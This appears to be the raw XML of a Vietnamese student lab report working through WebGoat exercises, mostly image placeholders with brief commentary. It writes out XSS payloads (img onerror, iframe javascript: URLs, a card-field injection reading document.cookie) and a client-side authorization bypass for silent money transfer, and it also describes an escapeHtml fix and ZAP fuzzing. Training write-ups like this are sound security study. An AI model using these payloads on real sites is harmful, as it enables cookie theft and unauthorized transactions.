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D0E7E3" w14:textId="46FFF907" w:rsidR="00323328" w:rsidRDefault="009C0B52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="035C80BB" wp14:editId="6FBEDC3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65016618" w14:textId="2D97239F" w:rsidR="009C0B52" w:rsidRDefault="009C0B52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63B0F354" wp14:editId="159C7091">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1A3E6667" w14:textId="3163763D" w:rsidR="009C0B52" w:rsidRDefault="009C0B52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07BA092D" wp14:editId="36248086">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79D2842B" w14:textId="77777777" w:rsidR="005528D2" w:rsidRDefault="009C0B52">
      <w:r>
        <w:t xml:space="preserve">Điều kiện hoàn thành Stage 2 là phải đổi request thành dạng XPath để </w:t>
      </w:r>
      <w:r w:rsidR="00C12AB4">
        <w:t xml:space="preserve">hạn chế thông tin resqond bằng cách thay đổi cách thức lọc dữ liểu ở File </w:t>
      </w:r>
      <w:r w:rsidR="00C12AB4" w:rsidRPr="00C12AB4">
        <w:t>clientSideFiltering.jsp</w:t>
      </w:r>
      <w:r w:rsidR="005414AD">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005528D2">
        <w:t xml:space="preserve">Ở đây sẽ chỉ lấy thông tin của các nhân viên do </w:t>
      </w:r>
      <w:r w:rsidR="005528D2" w:rsidRPr="005528D2">
        <w:t>Moe Stooge</w:t>
      </w:r>
      <w:r w:rsidR="005528D2">
        <w:t xml:space="preserve"> quản lý ta sẽ thêm biểu thức điều kiện </w:t>
      </w:r>
      <w:r w:rsidR="005528D2" w:rsidRPr="005528D2">
        <w:t>[Managers/Manager/text() = " + userId + "]</w:t>
      </w:r>
      <w:r w:rsidR="005528D2">
        <w:t xml:space="preserve"> vào sau node Employee =&gt; biểu thức mẫu: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBBC8AB" w14:textId="1C256B72" w:rsidR="009C0B52" w:rsidRDefault="005528D2">
      <w:r w:rsidRPr="005528D2">
        <w:t>"/Employees/Employee[Managers/Manager/text() = " + userId + "]/UserID | "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6297B7C6" w14:textId="52BDB4DF" w:rsidR="005528D2" w:rsidRDefault="005528D2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34CACCF3" wp14:editId="27413E5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41A9BCB2" w14:textId="150FB045" w:rsidR="00067D3A" w:rsidRDefault="00064A26">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sau đó ta tiến hành Build Maven như bình thường</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563F14BA" w14:textId="7F498942" w:rsidR="00067D3A" w:rsidRDefault="00067D3A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18BAF418" wp14:editId="18974BF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43239CF7" w14:textId="73E2D19F" w:rsidR="00067D3A" w:rsidRDefault="00D20660">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61DF2082" wp14:editId="222FFA6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5F90B965" w14:textId="07D4943D" w:rsidR="009E47A6" w:rsidRDefault="00E4662F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01479EF0" wp14:editId="2EA73432">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2FD0703E" w14:textId="6485C7AF" w:rsidR="008E3DA6" w:rsidRDefault="00280D4D">
      <w:r>
        <w:t>Ở</w:t>
      </w:r>
      <w:r w:rsidR="008E3DA6">
        <w:t xml:space="preserve"> đây ta có thể thấy sau khi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00087933">
        <w:t>nhập giá trị vào Textbox, giá trị này sẽ được hiển thị tại thẻ H1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4A6920" w14:textId="7D7086E6" w:rsidR="00E4662F" w:rsidRDefault="00E4662F" w:rsidP="00E4662F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Có thể nhập thẻ IMG vào theo hướng dẫn nh</w:t>
      </w:r>
      <w:r w:rsidR="008A3499">
        <w:t>ằ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">m </w:t>
      </w:r>
      <w:r w:rsidR="00C43880">
        <w:t>hiển thị ảnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC757CB" w14:textId="21DA9750" w:rsidR="00880F83" w:rsidRDefault="00FC2146" w:rsidP="00880F83">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CCDFB54" wp14:editId="1E4A4234">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59EBAA68" w14:textId="2D825D2C" w:rsidR="00FC2146" w:rsidRDefault="00FC2146" w:rsidP="00880F83">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D93132B" wp14:editId="1E57E89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7D3D1E92" w14:textId="7EE7606E" w:rsidR="00FC2146" w:rsidRDefault="004977EC" w:rsidP="00880F83">
      <w:r>
        <w:t>Tương tự để thực thi Stage 2 ta cần dùng thẻ Image để hiển thị 1 đoạn alert bất kì, về thẻ Image có 1 trigger có chức năng hiển thị 1 hàm khi không load được image đó là onerror</w:t>
      </w:r>
      <w:r w:rsidR="00354E1B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6B5499" w14:textId="5E7429C7" w:rsidR="00354E1B" w:rsidRDefault="00354E1B" w:rsidP="00880F83">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C2611CC" wp14:editId="23CCCC5E">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2973945B" w14:textId="6D2FF25A" w:rsidR="006024B8" w:rsidRDefault="006024B8" w:rsidP="00880F83">
      <w:r>
        <w:t xml:space="preserve">Ta có thể biến thể lại để trở thành đáp án câu này: </w:t>
      </w:r>
      <w:r w:rsidRPr="006024B8">
        <w:t>&lt;img src=abcxyz onerror="alert('Hacking Time';)" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63715104" w14:textId="3D4F61FD" w:rsidR="006024B8" w:rsidRDefault="006024B8" w:rsidP="00880F83">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7401AA11" wp14:editId="3D1A843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296EF43D" w14:textId="71AB978E" w:rsidR="006024B8" w:rsidRDefault="006024B8" w:rsidP="00880F83">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57748822" wp14:editId="24E1F66E">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5EE2105B" w14:textId="30A397CC" w:rsidR="00DF04F9" w:rsidRDefault="00DF04F9" w:rsidP="00880F83">
      <w:r>
        <w:t>Tương tự câu 2 ở câu 3 ta có thể dùng thuộc tính src để hiển thị</w:t>
      </w:r>
      <w:r w:rsidR="00D91B1E">
        <w:t xml:space="preserve"> alert trong thẻ IFRAME </w:t>
      </w:r>
      <w:r w:rsidR="00406C39">
        <w:t>để hiển thị đường dẫn như cách ta thực hiện ở phần XSS</w:t>
      </w:r>
      <w:r w:rsidR="0063741B">
        <w:t xml:space="preserve"> =&gt; url: javascript:alert(</w:t>
      </w:r>
      <w:r w:rsidR="0063741B" w:rsidRPr="006024B8">
        <w:t>'Hacking Time</w:t>
      </w:r>
      <w:r w:rsidR="0063741B">
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4ECC51" w14:textId="70E29454" w:rsidR="00D91B1E" w:rsidRDefault="00A84AE5" w:rsidP="00880F83">
      <w:r>
        <w:t>Đáp án sẽ là: &lt;IFRAME src="javascript:alert(</w:t>
      </w:r>
      <w:r w:rsidRPr="006024B8">
        <w:t>'Hacking Time</w:t>
      </w:r>
      <w:r>
        <w:t>');"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F615C71" w14:textId="408BD904" w:rsidR="00FE0A92" w:rsidRDefault="00FE0A92" w:rsidP="00880F83">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C72DED5" wp14:editId="6BF5676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50115421" w14:textId="5A864345" w:rsidR="00FE0A92" w:rsidRDefault="00FE0A92" w:rsidP="00880F83">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0100E8A7" wp14:editId="5AE44533">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6BCF9F0E" w14:textId="1D3A5E4A" w:rsidR="00D64D5E" w:rsidRDefault="00D64D5E" w:rsidP="00880F83">
      <w:r>
        <w:t>Tương tự Stage 1 ta cũng có thể chèn 1 đoạn html vào để biến đổi form như yêu cầu đề bài</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63400064" w14:textId="5813D77B" w:rsidR="00D64D5E" w:rsidRDefault="00D64D5E" w:rsidP="00880F83">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05DCEC18" wp14:editId="45D0031A">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C3E7E20" w14:textId="5A2D8639" w:rsidR="00D64D5E" w:rsidRDefault="00D64D5E" w:rsidP="00880F83">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E8D8340" wp14:editId="5FE4737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F83202F" w14:textId="7DB3CD16" w:rsidR="00D64D5E" w:rsidRDefault="002D718D" w:rsidP="004F14AF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Để ngăn chặn người dùng sử dụng Dom XSS ta cần sử dụng bộ lọc kí tự trong HTML đó là function </w:t>
      </w:r>
      <w:r w:rsidRPr="002D718D">
        <w:t>Html.escapeHtml(String)</w:t>
      </w:r>
      <w:r>
        <w:t>. Hàm sẽ trả về nội dung văn bản thuần tuý không chứa các kí tự ảnh hưởng đến html</w:t>
      </w:r>
      <w:r w:rsidR="00BE2386">
        <w:t xml:space="preserve">. Ở trường hợp đề bài trên, ta đã có sẵn 1 hàm </w:t>
      </w:r>
      <w:r w:rsidR="00BE2386" w:rsidRPr="002D718D">
        <w:t>escapeHtml(String)</w:t>
      </w:r>
      <w:r w:rsidR="00BE2386">
        <w:t xml:space="preserve"> vậy nên không cần dùng đến </w:t>
      </w:r>
      <w:r w:rsidR="004F14AF">
        <w:t>tiền tố Html. ở trước nữa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42839A46" w14:textId="15AB4EEC" w:rsidR="00BE2386" w:rsidRDefault="000B3EC8" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D7B880D" wp14:editId="7BFF8C03">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D8F6E3A" w14:textId="55BA4391" w:rsidR="000B3EC8" w:rsidRDefault="000B3EC8" w:rsidP="000B3EC8">
      <w:r>
        <w:t>Tại đây ta sẽ thay đổi src của script này một chút sau đó save file lại và submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD9F99" w14:textId="3CAE586A" w:rsidR="000B3EC8" w:rsidRDefault="000B3EC8" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67070DD5" wp14:editId="309C14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1C74F9AE" w14:textId="2B5E119D" w:rsidR="000B3EC8" w:rsidRDefault="000B3EC8" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66046BDA" wp14:editId="74344F5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2D67D2A" w14:textId="1DE5F302" w:rsidR="008934DF" w:rsidRDefault="008934DF" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0666087C" wp14:editId="2BE2265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9A862EE" w14:textId="1D53D1C3" w:rsidR="008934DF" w:rsidRDefault="008934DF" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1739141C" wp14:editId="413115D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3A2DC17" w14:textId="7D36EA98" w:rsidR="001B1667" w:rsidRDefault="001B1667" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED2CDB1" wp14:editId="36C527E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541AD089" w14:textId="4498A3A8" w:rsidR="008934DF" w:rsidRDefault="008934DF" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="457CC32E" wp14:editId="379B5F8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2ECB3C99" w14:textId="1ADE0938" w:rsidR="001B1667" w:rsidRDefault="001B1667" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04B96F33" wp14:editId="7697066A">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531474CC" w14:textId="7E8523ED" w:rsidR="001B1667" w:rsidRDefault="001B1667" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="613BB0B3" wp14:editId="18F4B309">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54C03C20" w14:textId="309750FF" w:rsidR="001B1667" w:rsidRDefault="001B1667" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AEE89FA" wp14:editId="6AE3649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380B1397" w14:textId="27A4272F" w:rsidR="001B1667" w:rsidRDefault="001B1667" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5351BA4F" wp14:editId="55473409">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5F7FF310" w14:textId="025E5488" w:rsidR="001B1667" w:rsidRDefault="00FD2C99" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44B66601" wp14:editId="359DD0C1">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77DDA5C4" w14:textId="0DA8DCA4" w:rsidR="00FD2C99" w:rsidRDefault="00FD2C99" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D9DFA91" wp14:editId="12DB99D3">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222540C5" w14:textId="28B79910" w:rsidR="00FD2C99" w:rsidRDefault="00FD2C99" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F4EE21E" wp14:editId="23F9297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2677B974" w14:textId="090F6619" w:rsidR="00FD2C99" w:rsidRDefault="00FD2C99" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="695225A9" wp14:editId="6E673955">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2ECC7612" w14:textId="0CA1741B" w:rsidR="00FD2C99" w:rsidRDefault="00FD2C99" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AF98AD3" wp14:editId="3D6FFF4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28EFE875" w14:textId="48E62D03" w:rsidR="00FD2C99" w:rsidRDefault="00FD2C99" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FAEB50D" wp14:editId="24422417">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4159A7CD" w14:textId="383857E4" w:rsidR="001C4369" w:rsidRDefault="001C4369" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50834838" wp14:editId="5994B032">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6490849E" w14:textId="78834ED5" w:rsidR="001C4369" w:rsidRDefault="001C4369" w:rsidP="001C4369">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="666EAA99" wp14:editId="50F8EC05">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60744B78" w14:textId="6366A3B1" w:rsidR="001C4369" w:rsidRDefault="001C4369" w:rsidP="001C4369">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Khi ấn Confrim sự kiện </w:t>
      </w:r>
      <w:r w:rsidRPr="001C4369">
        <w:t>processData</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">() sẽ diễn ra vậy nên để bypass user Authorization và âm thầm chuyển khoản ta sẽ thay thế hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="001C4369">
        <w:t>processData</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">() trong html thành </w:t>
      </w:r>
      <w:r w:rsidRPr="001C4369">
        <w:t>submitData(</w:t>
      </w:r>
      <w:r w:rsidR="00C24288">
        <w:t>anyA</w:t>
      </w:r>
      <w:r w:rsidRPr="001C4369">
        <w:t xml:space="preserve">ccountNo, </w:t>
      </w:r>
      <w:r w:rsidR="00C24288">
        <w:t>anyB</w:t>
      </w:r>
      <w:r w:rsidRPr="001C4369">
        <w:t>alance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7239521F" w14:textId="2FB98EFE" w:rsidR="001C4369" w:rsidRDefault="001C4369" w:rsidP="001C4369">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AD26666" wp14:editId="12610997">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CAF7565" w14:textId="488C5767" w:rsidR="001C4369" w:rsidRDefault="001C4369" w:rsidP="001C4369">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00977706" wp14:editId="35BDB652">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4B01DB1E" w14:textId="745EC9FD" w:rsidR="006A3772" w:rsidRDefault="006A3772" w:rsidP="001C4369">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7377D449" wp14:editId="7D38BC5D">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490FED3B" w14:textId="049F35EC" w:rsidR="001C4369" w:rsidRDefault="006A3772" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53A407FB" wp14:editId="5CD73EAD">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6AE45534" w14:textId="47F7B62D" w:rsidR="006A3772" w:rsidRDefault="006A3772" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="260A41A3" wp14:editId="7D6FE02A">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0514AD33" w14:textId="40C87BF4" w:rsidR="006A3772" w:rsidRDefault="006A3772" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77CAC17C" wp14:editId="7B2E7842">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664822C5" w14:textId="40B6CDD8" w:rsidR="006A3772" w:rsidRDefault="00251511" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AAB20D8" wp14:editId="368FAB99">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4003B953" w14:textId="36648594" w:rsidR="00251511" w:rsidRDefault="00251511" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="301C7EA9" wp14:editId="109131A3">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496547E5" w14:textId="3DF4D28C" w:rsidR="00EC7190" w:rsidRDefault="00EC7190" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="743E1268" wp14:editId="1AC83F1A">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794B8E3E" w14:textId="0F299879" w:rsidR="006A3772" w:rsidRDefault="00EC7190" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D9A9785" wp14:editId="69993A75">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49CB0D22" w14:textId="291FC109" w:rsidR="00EC7190" w:rsidRDefault="00EC7190" w:rsidP="000B3EC8">
      <w:r>
        <w:t xml:space="preserve">Theo phương thức thanh toán này ta không cần phải thêm tag script vào mà ta sẽ điền vào thông tin thẻ như thế này: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7190">
        <w:t>123');alert(document.cookie);('</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> =&gt; alert('</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7190">
        <w:t>123');alert(document.cookie);</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(''); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423D4000" w14:textId="5B860469" w:rsidR="00EC7190" w:rsidRDefault="00EC7190" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54D67404" wp14:editId="56FA4DC3">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3F64106E" w14:textId="13F2E1F2" w:rsidR="00EC7190" w:rsidRDefault="00EC7190" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7004376E" wp14:editId="67446533">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67D2AD6B" w14:textId="1A5036B8" w:rsidR="006D089D" w:rsidRDefault="006D089D" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D02DE5B" wp14:editId="4B7E8CA7">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124FE526" w14:textId="7EB51B61" w:rsidR="00401DAE" w:rsidRDefault="00FB3BB3" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04E8573F" wp14:editId="1578D441">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187E6317" w14:textId="57737A7C" w:rsidR="00401DAE" w:rsidRDefault="00401DAE" w:rsidP="000B3EC8">
      <w:r>
        <w:t>Đây là kết quả tương đối đối với bộ xử lý này, tuỳ thuộc vào bộ xử lý của từng máy mà kết quả sẽ khác nhau, vì vậy ta phải tiến hành thay đổi source code để có thể pass lesson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042EBBB8" w14:textId="390436E1" w:rsidR="00FB3BB3" w:rsidRDefault="0073579E" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E523F3B" wp14:editId="21E71458">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71BA3771" w14:textId="507CA035" w:rsidR="0073579E" w:rsidRDefault="00344B1A" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D71AA16" wp14:editId="3C7B4F13">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581ADF41" w14:textId="4BD5CA5B" w:rsidR="00BA39CE" w:rsidRDefault="00BA39CE" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="503E7A78" wp14:editId="2BA8A2F7">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63C0E497" w14:textId="552B795A" w:rsidR="004C361A" w:rsidRDefault="004C361A" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FB550CF" wp14:editId="4515174B">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7FDB5B1E" w14:textId="4950C43D" w:rsidR="004C361A" w:rsidRDefault="004C361A" w:rsidP="000B3EC8">
      <w:r>
        <w:t xml:space="preserve">Cấu trúc form Result chính xác sẽ bao gồm password thật của tài khoản </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F5FCEB" w14:textId="0B3D6B06" w:rsidR="00BA39CE" w:rsidRDefault="00BA39CE" w:rsidP="004C361A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Để kiểm tra </w:t>
      </w:r>
      <w:r w:rsidR="00DA7454">
        <w:t>kết quả ta cần chức năng Puzzer của ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B160A" w14:textId="39806F10" w:rsidR="00B75DFD" w:rsidRDefault="00B75DFD" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7115FCF1" wp14:editId="31CA5089">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217BAB2C" w14:textId="0DCC5996" w:rsidR="00344B1A" w:rsidRDefault="00B75DFD" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08C52757" wp14:editId="439274F8">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26A9DED7" w14:textId="442DFEAA" w:rsidR="00B75DFD" w:rsidRDefault="00B75DFD" w:rsidP="000B3EC8">
      <w:r>
        <w:t xml:space="preserve">Như hình kết quả </w:t>
      </w:r>
      <w:r w:rsidR="00B83E17">
        <w:t>là</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338F91F5" w14:textId="41ABDCDA" w:rsidR="004C361A" w:rsidRDefault="004C361A" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7826DC79" wp14:editId="41433F07">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7944608C" w14:textId="5EAE903D" w:rsidR="009B1B3A" w:rsidRDefault="009B1B3A" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
